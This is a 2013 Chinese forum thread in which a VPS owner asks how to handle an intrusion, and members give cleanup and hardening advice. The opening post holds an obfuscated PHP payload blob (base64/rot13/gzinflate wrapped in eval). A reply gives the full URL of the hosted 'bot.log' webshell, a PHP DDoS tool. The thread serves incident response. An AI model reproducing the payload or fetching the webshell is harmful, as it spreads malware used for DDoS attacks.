AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Binom
 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G⚡️最干净<Wifi住宅+5G移动>IP代理指纹浏览器,就用AdsPower
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利广告开户独立站⚡️开户投放
DuoPlus专注打造跨境电商云手机E.PN 虚拟卡BINOM TRACKER 60% OFF!比Adplexity还好用的Spy工具
MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量百度国际MediaGo,独家原生流量
ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理虚拟信用卡+独立站收款全球虚拟卡, 支持U充值
Facebook 批量上广告尤里改 - FB 稳定投放免费黑五教程(持续更新、欢迎交流)FB 三不限源头 - 自助下户充值转款
各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户一手BM分享户不限额9Proxy ⚡️ $0.04/IP, 无限带宽
FB二三解0.1元一个虚拟卡|PTM星际卡FB专用虚拟卡Google、Bing官方总代  联盟流量开户
fb耐用号0.01一个fb账号官方合作商搜索套利开户❤️Bigo/Kwai/MediagoFB资源,账单户,分享户,国内一手
广告位出租   
查看: 6973|回复: 9

centos VPS被入侵,我该怎么处理?

[复制链接]

132

主题

456

广告币

1020

积分

中级会员

Rank: 3Rank: 3

积分
1020

社区QQ达人

发表于 2013-5-29 13:14:50 | 显示全部楼层 |阅读模式
本帖最后由 zghz 于 2013-5-29 13:16 编辑

这个黑客昨天在我的网站根目录放了若干个文件,然后我的站点任何一个页面打开就只出现一个图片无法显示的红X。

查看网页源码,它把下面的字符串经过 eval(gzinflate(str_rot13(base64_decode('这里放的是下面字符串')))) N重加密

3ZjNd4NAGFL3hb6DuyQFNb+lNEO6KV1p032w+hktk5nBGXhPyLs3LU2NV4jTht5pF4ODB8M9HBKH/TDlvo4FX9A6SU31e7QmvzcYeS
8v7j8+9nvZkrQVdi1iXTfLMicg4SmicVJZOJy5mbR9wTVk7VeWLnCu3BehHSaWlv1xbKPr8Sz0pjfXs+F1U8PpzSQcQib+iz8dBU4wZ17lZ
S4pbifd2RvMv7j8Z3/IkFickYvtHxyIjDPhBZbtGSKekWLD15atUZr4cQhqalO8kLQfnfoLmfGbgT0+PJs97u58LytMTGkSaZ9BYLltJeew08
75Qyde8KFC/YsTe/IFJuz0C0BgBcQ8oLUjI+lctZEbiuKbfulj/BC7+8Hd5QUxUmRY0aiIGFtHuqb8ArFhqmdrAqzS4ervgBJIfkhVQPVI8b
DESiXreaiDbMFpQxsltgzwm6iV9i/IAbiP2jBkckTrklMzHbn3F+1xQ0SGDCe01FN2TRUd9WwB2UM5GaAyZjJgWhaEsHfMARFomKOBKT
Cn6mGjb1O4nUcjxB38H+ijOim6AJC7qIb4D4Xw5iXHcKr2Cr56n+4hZjRypKeUjpI0j5niEjF0VzY8v5V5uHOrMKI6rVEEtEwJh+WxkquzX
CqTgo2bJiPy/PEDp4UVXwfAkdOEBNdQo0R+USDGf7B5au8=

网友帮我解密后代码如下:



我的理解是他把代码放在了图片里,然后在我的目录里面执行了这些代码,我想获取这个图片看他到底做了什么但是我不知道该怎
么获取。



PS:后来我把这些文件删除了,我发现除了昨天,前几天这个人还放了其他一些文件到我的服务器,并且那时候访问我的网站任
何页面都非常卡,重启服务器后情况缓解,但过一段时间又变得非常卡,不知道是不是这个黑客又进行了某些操作导致的。

请问

1.能否有兄弟帮我找到这个图片并翻译成代码

2.他是通过什么手段入侵我的服务器的?

3.要这么做好服务器安全措施,以防再次被攻击?

先谢谢大家了!

相关帖子
回复

使用道具 举报

11

主题

179

广告币

304

积分

初级会员

Rank: 2

积分
304

社区QQ达人

发表于 2013-5-29 15:08:59 | 显示全部楼层
回复 支持 反对

使用道具 举报

116

主题

1970

广告币

2526

积分

版主

名利权情牢是非成败空大家可以叫我空或空空希望能跟大家成为朋友

Rank: 7Rank: 7Rank: 7

积分
2526

社区QQ达人

发表于 2013-5-29 15:42:35 | 显示全部楼层
1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/bot.log

2.他是通过什么手段入侵我的服务器的?

任何一个漏洞都可以入侵你的服务器,最普遍的如系统漏洞、网站程序漏洞,如果你用的是常用的CMS或博客类程序的话 十有八九是网站程序造成的

3.要这么做好服务器安全措施,以防再次被攻击?

服务器安全防护是一个专业领域,需要花大量时间学习和研究。
防止被攻击,最基础也是最简单的有效的方法就是经常更新网站程序,因为根据我的经验90%以上的入侵都是由网站漏洞造成。

想更安全一点的话可以修改SSH默认端口;关闭不用的端口;安装防火墙(常用的如CSF);安装杀毒软件(如ClamAV)定期的进行扫描等等。

另外想告诉你,被加密代码的作用是下载“bot.log”这个webshell,这个webshell是一个phpddos,用来攻击其他的服务器,很占服务器资源,这就是为什么你的网站打开很卡的原因。

评分

参与人数 3广告币 +4 收起 理由
zghz + 2
Smythe_Bob + 1 赞一个!
331008 + 1 很给力!

查看全部评分

承蒙骄阳当年提携 感谢河马现今不弃 能在广告中国做版主 我很感恩 | 我没有什么才能 更不是什么大佬 但我喜欢学习和分享 期盼在这里一起成长[我的日记]
回复 支持 反对

使用道具 举报

132

主题

456

广告币

1020

积分

中级会员

Rank: 3Rank: 3

积分
1020

社区QQ达人

 楼主| 发表于 2013-5-29 15:48:52 | 显示全部楼层
fatiery 发表于 2013-5-29 15:42
1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/b ...

太感谢你了兄弟!bot。log这个webshell 是否还存在我的电脑里面,如果还存在我该怎么删除它呢?
回复 支持 反对

使用道具 举报

116

主题

1970

广告币

2526

积分

版主

名利权情牢是非成败空大家可以叫我空或空空希望能跟大家成为朋友

Rank: 7Rank: 7Rank: 7

积分
2526

社区QQ达人

发表于 2013-5-29 17:00:23 | 显示全部楼层
你可以运行 find whereis locate 这样的查找命令 查找文件并清除

关于命令的详细介绍请看:http://www.iteye.com/topic/406709
承蒙骄阳当年提携 感谢河马现今不弃 能在广告中国做版主 我很感恩 | 我没有什么才能 更不是什么大佬 但我喜欢学习和分享 期盼在这里一起成长[我的日记]
回复 支持 反对

使用道具 举报

2

主题

27

广告币

139

积分

初级会员

Rank: 2

积分
139
发表于 2013-5-29 18:06:21 | 显示全部楼层
history 命令, 如果没删除的话.
回复 支持 反对

使用道具 举报

1621

主题

2万

广告币

2万

积分

管理员

宇宙无敌河马天神

Rank: 9Rank: 9Rank: 9

积分
29674

社区QQ达人

发表于 2013-5-30 03:31:47 | 显示全部楼层
入侵是挡不住的,只能经常备份,同时随时升级

对于vps 来说,如果不是很懂的话,建议买managed 的服务

否则问题多多
学会提问的艺术, 从小处入手, 忌大而空
AdvertCN电报群

我最喜欢用的工具
7200W全球动态不重复住宅IP代理
回复 支持 反对

使用道具 举报

132

主题

456

广告币

1020

积分

中级会员

Rank: 3Rank: 3

积分
1020

社区QQ达人

 楼主| 发表于 2013-5-30 10:10:57 | 显示全部楼层
luguo 发表于 2013-5-29 18:06
history 命令, 如果没删除的话.

好的兄弟,谢谢!
回复 支持 反对

使用道具 举报

132

主题

456

广告币

1020

积分

中级会员

Rank: 3Rank: 3

积分
1020

社区QQ达人

 楼主| 发表于 2013-5-30 10:13:43 | 显示全部楼层
河小马 发表于 2013-5-30 03:31
入侵是挡不住的,只能经常备份,同时随时升级

对于vps 来说,如果不是很懂的话,建议买managed 的服务

好的,感谢河马!
回复 支持 反对

使用道具 举报

16

主题

1811

广告币

2217

积分

高级会员

Rank: 4

积分
2217

社区QQ达人

发表于 2013-5-30 16:27:05 | 显示全部楼层
入侵分两种,一种是网站程序漏洞,一种是服务器本身的漏洞,服务器可以用IPTABLES把非80端口的外网请求全禁了,程序漏洞的话麻烦。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2024-12-4 16:32 , Processed in 0.048959 second(s), 15 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表